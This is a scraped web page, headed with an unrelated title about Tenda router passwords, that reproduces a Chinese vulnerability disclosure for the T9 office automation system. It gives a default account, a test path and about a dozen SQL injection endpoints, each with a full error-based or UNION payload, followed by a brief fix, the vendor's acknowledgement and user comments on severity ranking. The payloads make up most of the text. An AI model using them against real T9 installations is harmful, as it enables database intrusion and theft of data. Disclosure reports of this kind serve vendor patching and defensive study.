tenda密码_oa5610的连接密码是?

来源:蜘蛛抓取(WebSpider) 时间:2016-01-10 11:01 标签: tenda路由器初始密码
分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
T9智能管理平台是基于B/S架构,灵活、稳定、安全、高性能的办公系统。采用自主研发的引擎技术,提供强大的工作流和公文流程管理功能,可完全根据客户需求定制办公门户平台。
详细说明:
测试地址 /t9/core/frame/webos/index.jsp
测试帐号及密码 oa/无
漏洞分析:
/t9/t9/core/funcs/message/weixun_share/act/T9WeiXunShareAct/getWeiXunById.act
wxid=110' UNION ALL SELECT NULL,CONCAT(user(),':',version()),NULL,NULL,NULL,NULL,NULL#
/t9/t9/core/funcs/diary/act/T9DiaryAct/deleteDia.act
diaIds=2 AND (SELECT 4200 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x716f697271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
/t9/t9/core/funcs/email/act/T9InnerEMailAct/deletM.act?bodyId=3 AND (SELECT 6356 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&deType=4&deType=4
/t9/t9/core/funcs/email/act/T9EmailNameAct/saveName.act
name=xxxxxxxxxxx&IS_USE=1&IS_USE1=1&NAME_ID=4' AND (SELECT 5610 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fKtu'='fKtu
/t9/t9/core/funcs/email/act/T9EmailBoxAct/isBoxNameExist.act
boxName=xxxxx' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VnVS'='VnVS&boxId=1
/t9/t9/subsys/oa/vote/act/T9VoteTitleAct/selectId2.act?seqId=323' AND (SELECT 2538 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x716c756b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GhCY'='GhCY
/t9/t9/subsys/oa/vote/act/T9VoteTitleAct/deleteVote.act?seqIds=1) AND (SELECT 7548 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x717a716571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (
{&rtState&:&1&, &rtMsrg&:&Duplicate entry '' for key 1&, &rtData&:&&}
/t9/t9/subsys/oa/vote/act/T9VoteTitleAct/clonVote.act?seqIds=1) AND (SELECT 7548 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x717a716571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (
/t9/t9/subsys/oa/vote/act/T9VoteTitleAct/updateNoTopVote.act?seqIds=1) AND (SELECT 7548 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x717a716571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (
/t9/t9/core/funcs/news/act/T9NewsShowAct/getDeskNewsAllList.act?type=; AND (SELECT 7974 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x716e707471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Awzk'='Awzk
post_data:
totalRecords=5
/t9/t9/core/funcs/workflow/act/T9MyWorkAct/hasWork.act?sortId=1) AND (SELECT 6837 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (&flowId=562&flowId=562
/t9/core/funcs/workflow/flowrun/list/index1.jsp?type=2&sortId=1) AND (SELECT 6837 FROM(SELECT COUNT(*),CONCAT(user(),(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (&skin=&flowId=562
漏洞证明:
修复方案:
对wxid参数加引号处理
版权声明:转载请注明来源 @
厂商回应:
危害等级:中
漏洞Rank:5
确认时间: 09:40
厂商回复:
我们会尽快修复,感谢您的报告。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
要登录的吗?
干嘛不一个一个发多混几个rank。。
@ACGT 鄙视
@Finger 如果按照我的建议,对白帽子、乌云都是有利的:对乌云来说,乌云的漏洞数增加了,浏览量也增加了,更容易忽悠融资了。对厂商来说,确认1个洞和确认12个洞没什么区别。对审核人员来说,如果审核人员的收入是按审核漏洞的数量决定的,那么对审核人员也是有利的,可惜不是。
这厂商秀逗了吧,12个注入点给中,5rank,对这种厂商还真的就需要一个个发@menmen519
小伙伴,别鸡冻。。初衷是为了发现问题。。。混个脸熟。,。。
要登录进去才能射
登录后才能发表评论,请先

我要回帖

更多关于 tenda路由器初始密码 的文章

 

随机推荐